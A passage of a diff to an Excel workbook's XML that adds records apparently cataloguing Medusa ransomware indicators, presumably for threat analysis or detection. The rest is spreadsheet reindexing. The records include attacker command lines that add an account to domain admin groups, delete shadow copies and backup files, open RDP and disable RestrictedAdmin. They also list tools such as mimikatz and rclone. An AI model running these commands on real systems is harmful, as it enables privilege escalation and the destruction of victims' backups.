+    <s v="net group &quot;domain admins&quot; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0047"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net group &quot;Domain Admins&quot; default /add /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0048"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net group &quot;Enterprise Admins&quot; default /add /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0049"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net group &quot;Remote Desktop Users&quot; default /add /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0050"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net group &quot;Group Policy Creator Owners&quot; default /add /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0051"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net group &quot;Schema Admins&quot; default /add /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0052"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net group &quot;domain users&quot; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0053"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net user default /active:yes /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0054"/>
+    <s v="netclt-pid"/>
+    <s v="cmdline"/>
+    <s v="net user /add default &lt;password&gt; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0055"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="query user"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0056"/>
+    <s v="registry-pid"/>
+    <s v="cmdline"/>
+    <s v="reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0057"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="systeminfo"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0058"/>
+    <s v="vss-pid"/>
+    <s v="cmdline"/>
+    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0059"/>
+    <s v="vss-pid"/>
+    <s v="cmdline"/>
+    <s v="vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0060"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.*%s*.set %s*.win %s*.dsk"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0061"/>
+    <s v="netsh-pid"/>
+    <s v="cmdline"/>
+    <s v="netsh advfirewall firewall add rule name=&quot;rdp&quot; dir=in protocol=tcp localport=3389 action=allow"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0062"/>
+    <s v="netsh-pid"/>
+    <s v="cmdline"/>
+    <s v="netsh advfirewall firewall set rule group=&quot;windows management instrumentation (wmi)&quot; new enable=yes"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0063"/>
+    <m/>
+    <s v="cmdline"/>
+    <s v="reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0064"/>
+    <s v="mimikatz-pid"/>
+    <s v="htool"/>
+    <s v="mimikatz "/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0065"/>
+    <m/>
+    <s v="htool"/>
+    <s v="pdq deploy"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0066"/>
+    <s v="psexec-pid"/>
+    <s v="htool"/>
+    <s v="psexec"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0067"/>
+    <s v="rclone-pid"/>
+    <s v="htool"/>
+    <s v="rclone"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0068"/>
+    <m/>
+    <s v="htool"/>
+    <s v="advanced IP scanner"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0069"/>
+    <s v="netscan-pid"/>
+    <s v="htool"/>
+    <s v="Softperfect Netscan"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <s v="medusa-eid0070"/>
+    <m/>
+    <s v="generic"/>
+    <s v="scanned ports 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389"/>
+    <m/>
+    <x v="0"/>
+  </r>
+</pivotCacheRecords>
+</file>
+
+<file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{D5D7A43D-0F5C-9C41-98FD-0322A1B7141F}" name="PivotTable6" cacheId="73" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+  <location ref="A3:C5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
+  <pivotFields count="6">
+    <pivotField showAll="0"/>
+    <pivotField dataField="1" showAll="0"/>
+    <pivotField dataField="1" showAll="0"/>
+    <pivotField showAll="0"/>
+    <pivotField showAll="0"/>
+    <pivotField axis="axisRow" showAll="0">
+      <items count="2">
+        <item x="0"/>
+        <item t="default"/>
+      </items>
+    </pivotField>
+  </pivotFields>
+  <rowFields count="1">
+    <field x="5"/>
+  </rowFields>
+  <rowItems count="2">
+    <i>
+      <x/>
+    </i>
+    <i t="grand">
+      <x/>
+    </i>
+  </rowItems>
+  <colFields count="1">
+    <field x="-2"/>
+  </colFields>
+  <colItems count="2">
+    <i>
+      <x/>
+    </i>
+    <i i="1">
+      <x v="1"/>
+    </i>
+  </colItems>
+  <dataFields count="2">
+    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
+    <dataField name="Count of eid_type" fld="2" subtotal="count" baseField="0" baseItem="0"/>
+  </dataFields>
+  <pivotTableStyleInfo name="PivotStyleLight16" showRowHeaders="1" showColHeaders="1" showRowStripes="0" showColStripes="0" showLastColumn="1"/>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{962EF5D1-5CA2-4c93-8EF4-DBF5C05439D2}">
+      <x14:pivotTableDefinition xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" hideValuesRow="1"/>
+    </ext>
+    <ext xmlns:xpdl="http://schemas.microsoft.com/office/spreadsheetml/2016/pivotdefaultlayout" uri="{747A6164-185A-40DC-8AA5-F01512510D54}">
+      <xpdl:pivotTableDefinition16/>
+    </ext>
+  </extLst>
+</pivotTableDefinition>
+</file>
+
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F71" totalsRowShown="0" dataDxfId="0">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F71" totalsRowShown="0" dataDxfId="6">
   <autoFilter ref="A1:F71" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
   <tableColumns count="6">
-    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
-    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
-    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="4"/>
-    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="3"/>
-    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="2"/>
-    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta" dataDxfId="1"/>
+    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
+    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
+    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
+    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
+    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
+    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta" dataDxfId="0"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -920,7 +1631,7 @@
   <dimension ref="A1:F71"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="D6" sqref="D6"/>
+      <selection activeCell="B69" sqref="B69"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -955,1122 +1666,1220 @@
     </row>
     <row r="2" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A2" s="1" t="s">
-        <v>80</v>
-      </c>
-      <c r="B2" s="1"/>
+        <v>77</v>
+      </c>
+      <c r="B2" s="1" t="s">
+        <v>159</v>
+      </c>
       <c r="C2" s="1" t="s">
+        <v>147</v>
+      </c>
+      <c r="D2" s="1" t="s">
         <v>6</v>
-      </c>
-      <c r="D2" s="1" t="s">
-        <v>7</v>
       </c>
       <c r="E2" s="1"/>
       <c r="F2" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="3" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A3" s="1" t="s">
-        <v>81</v>
-      </c>
-      <c r="B3" s="1"/>
+        <v>78</v>
+      </c>
+      <c r="B3" s="1" t="s">
+        <v>159</v>
+      </c>
       <c r="C3" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D3" s="1" t="s">
-        <v>9</v>
+        <v>8</v>
       </c>
       <c r="E3" s="1"/>
       <c r="F3" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="4" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A4" s="1" t="s">
-        <v>82</v>
+        <v>79</v>
       </c>
       <c r="B4" s="1"/>
       <c r="C4" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D4" s="1" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="E4" s="1"/>
       <c r="F4" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="5" spans="1:6" ht="119" x14ac:dyDescent="0.2">
       <c r="A5" s="1" t="s">
-        <v>83</v>
+        <v>80</v>
       </c>
       <c r="B5" s="1"/>
       <c r="C5" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D5" s="1" t="s">
-        <v>11</v>
+        <v>10</v>
       </c>
       <c r="E5" s="1"/>
       <c r="F5" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="6" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A6" s="1" t="s">
-        <v>84</v>
-      </c>
-      <c r="B6" s="1"/>
+        <v>81</v>
+      </c>
+      <c r="B6" s="1" t="s">
+        <v>158</v>
+      </c>
       <c r="C6" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D6" s="1" t="s">
-        <v>12</v>
+        <v>11</v>
       </c>
       <c r="E6" s="1"/>
       <c r="F6" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A7" s="1" t="s">
-        <v>85</v>
-      </c>
-      <c r="B7" s="1"/>
+        <v>82</v>
+      </c>
+      <c r="B7" s="1" t="s">
+        <v>154</v>
+      </c>
       <c r="C7" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D7" s="1" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="E7" s="1"/>
       <c r="F7" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A8" s="1" t="s">
-        <v>86</v>
-      </c>
-      <c r="B8" s="1"/>
+        <v>83</v>
+      </c>
+      <c r="B8" s="1" t="s">
+        <v>154</v>
+      </c>
       <c r="C8" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D8" s="1" t="s">
-        <v>14</v>
+        <v>13</v>
       </c>
       <c r="E8" s="1"/>
       <c r="F8" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="9" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A9" s="1" t="s">
-        <v>87</v>
+        <v>84</v>
       </c>
       <c r="B9" s="1"/>
       <c r="C9" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D9" s="1" t="s">
-        <v>15</v>
+        <v>14</v>
       </c>
       <c r="E9" s="1"/>
       <c r="F9" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="10" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A10" s="1" t="s">
-        <v>88</v>
+        <v>85</v>
       </c>
       <c r="B10" s="1"/>
       <c r="C10" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D10" s="1" t="s">
-        <v>16</v>
+        <v>15</v>
       </c>
       <c r="E10" s="1"/>
       <c r="F10" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A11" s="1" t="s">
-        <v>89</v>
+        <v>86</v>
       </c>
       <c r="B11" s="1"/>
       <c r="C11" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D11" s="1" t="s">
-        <v>17</v>
+        <v>16</v>
       </c>
       <c r="E11" s="1"/>
       <c r="F11" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="12" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A12" s="1" t="s">
-        <v>90</v>
+        <v>87</v>
       </c>
       <c r="B12" s="1"/>
       <c r="C12" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D12" s="1" t="s">
-        <v>18</v>
+        <v>17</v>
       </c>
       <c r="E12" s="1"/>
       <c r="F12" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A13" s="1" t="s">
-        <v>91</v>
+        <v>88</v>
       </c>
       <c r="B13" s="1"/>
       <c r="C13" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D13" s="1" t="s">
-        <v>19</v>
+        <v>18</v>
       </c>
       <c r="E13" s="1"/>
       <c r="F13" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="14" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A14" s="1" t="s">
-        <v>92</v>
+        <v>89</v>
       </c>
       <c r="B14" s="1"/>
       <c r="C14" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D14" s="1" t="s">
-        <v>20</v>
+        <v>19</v>
       </c>
       <c r="E14" s="1"/>
       <c r="F14" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="15" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A15" s="1" t="s">
-        <v>93</v>
+        <v>90</v>
       </c>
       <c r="B15" s="1"/>
       <c r="C15" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D15" s="1" t="s">
-        <v>21</v>
+        <v>20</v>
       </c>
       <c r="E15" s="1"/>
       <c r="F15" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="16" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A16" s="1" t="s">
-        <v>94</v>
+        <v>91</v>
       </c>
       <c r="B16" s="1"/>
       <c r="C16" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D16" s="1" t="s">
-        <v>22</v>
+        <v>21</v>
       </c>
       <c r="E16" s="1"/>
       <c r="F16" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="17" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A17" s="1" t="s">
-        <v>95</v>
+        <v>92</v>
       </c>
       <c r="B17" s="1"/>
       <c r="C17" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D17" s="1" t="s">
-        <v>23</v>
+        <v>22</v>
       </c>
       <c r="E17" s="1"/>
       <c r="F17" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="18" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A18" s="1" t="s">
-        <v>96</v>
+        <v>93</v>
       </c>
       <c r="B18" s="1"/>
       <c r="C18" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D18" s="1" t="s">
-        <v>24</v>
+        <v>23</v>
       </c>
       <c r="E18" s="1"/>
       <c r="F18" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="19" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A19" s="1" t="s">
-        <v>97</v>
-      </c>
-      <c r="B19" s="1"/>
+        <v>94</v>
+      </c>
+      <c r="B19" s="1" t="s">
+        <v>157</v>
+      </c>
       <c r="C19" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D19" s="1" t="s">
-        <v>25</v>
+        <v>24</v>
       </c>
       <c r="E19" s="1"/>
       <c r="F19" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A20" s="1" t="s">
-        <v>98</v>
-      </c>
-      <c r="B20" s="1"/>
+        <v>95</v>
+      </c>
+      <c r="B20" s="1" t="s">
+        <v>157</v>
+      </c>
       <c r="C20" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D20" s="1" t="s">
-        <v>26</v>
+        <v>25</v>
       </c>
       <c r="E20" s="1"/>
       <c r="F20" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="21" spans="1:6" ht="119" x14ac:dyDescent="0.2">
       <c r="A21" s="1" t="s">
-        <v>99</v>
-      </c>
-      <c r="B21" s="1"/>
+        <v>96</v>
+      </c>
+      <c r="B21" s="1" t="s">
+        <v>157</v>
+      </c>
       <c r="C21" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D21" s="1" t="s">
-        <v>27</v>
+        <v>26</v>
       </c>
       <c r="E21" s="1"/>
       <c r="F21" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="22" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A22" s="1" t="s">
-        <v>100</v>
+        <v>97</v>
       </c>
       <c r="B22" s="1"/>
       <c r="C22" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D22" s="1" t="s">
-        <v>28</v>
+        <v>27</v>
       </c>
       <c r="E22" s="1"/>
       <c r="F22" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="23" spans="1:6" ht="68" x14ac:dyDescent="0.2">
       <c r="A23" s="1" t="s">
-        <v>101</v>
+        <v>98</v>
       </c>
       <c r="B23" s="1"/>
       <c r="C23" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D23" s="1" t="s">
-        <v>29</v>
+        <v>28</v>
       </c>
       <c r="E23" s="1"/>
       <c r="F23" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="24" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A24" s="1" t="s">
-        <v>102</v>
-      </c>
-      <c r="B24" s="1"/>
+        <v>99</v>
+      </c>
+      <c r="B24" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C24" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D24" s="1" t="s">
-        <v>30</v>
+        <v>29</v>
       </c>
       <c r="E24" s="1"/>
       <c r="F24" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="25" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A25" s="1" t="s">
-        <v>103</v>
-      </c>
-      <c r="B25" s="1"/>
+        <v>100</v>
+      </c>
+      <c r="B25" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C25" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D25" s="1" t="s">
-        <v>31</v>
+        <v>30</v>
       </c>
       <c r="E25" s="1"/>
       <c r="F25" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="26" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A26" s="1" t="s">
-        <v>104</v>
-      </c>
-      <c r="B26" s="1"/>
+        <v>101</v>
+      </c>
+      <c r="B26" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C26" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D26" s="1" t="s">
-        <v>32</v>
+        <v>31</v>
       </c>
       <c r="E26" s="1"/>
       <c r="F26" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="27" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A27" s="1" t="s">
-        <v>105</v>
-      </c>
-      <c r="B27" s="1"/>
+        <v>102</v>
+      </c>
+      <c r="B27" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C27" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D27" s="1" t="s">
-        <v>33</v>
+        <v>32</v>
       </c>
       <c r="E27" s="1"/>
       <c r="F27" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="28" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A28" s="1" t="s">
-        <v>106</v>
-      </c>
-      <c r="B28" s="1"/>
+        <v>103</v>
+      </c>
+      <c r="B28" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C28" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D28" s="1" t="s">
-        <v>34</v>
+        <v>33</v>
       </c>
       <c r="E28" s="1"/>
       <c r="F28" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="29" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A29" s="1" t="s">
-        <v>107</v>
-      </c>
-      <c r="B29" s="1"/>
+        <v>104</v>
+      </c>
+      <c r="B29" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C29" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D29" s="1" t="s">
-        <v>35</v>
+        <v>34</v>
       </c>
       <c r="E29" s="1"/>
       <c r="F29" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="30" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A30" s="1" t="s">
-        <v>108</v>
-      </c>
-      <c r="B30" s="1"/>
+        <v>105</v>
+      </c>
+      <c r="B30" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C30" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D30" s="1" t="s">
-        <v>36</v>
+        <v>35</v>
       </c>
       <c r="E30" s="1"/>
       <c r="F30" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="31" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A31" s="1" t="s">
-        <v>109</v>
-      </c>
-      <c r="B31" s="1"/>
+        <v>106</v>
+      </c>
+      <c r="B31" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C31" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D31" s="1" t="s">
-        <v>37</v>
+        <v>36</v>
       </c>
       <c r="E31" s="1"/>
       <c r="F31" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="32" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A32" s="1" t="s">
-        <v>110</v>
-      </c>
-      <c r="B32" s="1"/>
+        <v>107</v>
+      </c>
+      <c r="B32" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C32" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D32" s="1" t="s">
-        <v>38</v>
+        <v>37</v>
       </c>
       <c r="E32" s="1"/>
       <c r="F32" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="33" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A33" s="1" t="s">
-        <v>111</v>
-      </c>
-      <c r="B33" s="1"/>
+        <v>108</v>
+      </c>
+      <c r="B33" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C33" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D33" s="1" t="s">
-        <v>39</v>
+        <v>38</v>
       </c>
       <c r="E33" s="1"/>
       <c r="F33" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="34" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A34" s="1" t="s">
-        <v>112</v>
-      </c>
-      <c r="B34" s="1"/>
+        <v>109</v>
+      </c>
+      <c r="B34" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C34" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D34" s="1" t="s">
-        <v>40</v>
+        <v>39</v>
       </c>
       <c r="E34" s="1"/>
       <c r="F34" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="35" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A35" s="1" t="s">
-        <v>113</v>
-      </c>
-      <c r="B35" s="1"/>
+        <v>110</v>
+      </c>
+      <c r="B35" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C35" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D35" s="1" t="s">
-        <v>41</v>
+        <v>40</v>
       </c>
       <c r="E35" s="1"/>
       <c r="F35" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="36" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A36" s="1" t="s">
-        <v>114</v>
-      </c>
-      <c r="B36" s="1"/>
+        <v>111</v>
+      </c>
+      <c r="B36" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C36" s="1" t="s">
-        <v>6</v>
+        <v>147</v>
       </c>
       <c r="D36" s="1" t="s">
-        <v>42</v>
+        <v>41</v>
       </c>
       <c r="E36" s="1"/>
       <c r="F36" s="1" t="s">
-        <v>8</v>
+        <v>7</v>
       </c>
     </row>
     <row r="37" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A37" s="1" t="s">
-        <v>115</v>
-      </c>
-      <c r="B37" s="1"/>
+        <v>112</v>
+      </c>
+      <c r="B37" s="1" t="s">
+        <v>156</v>
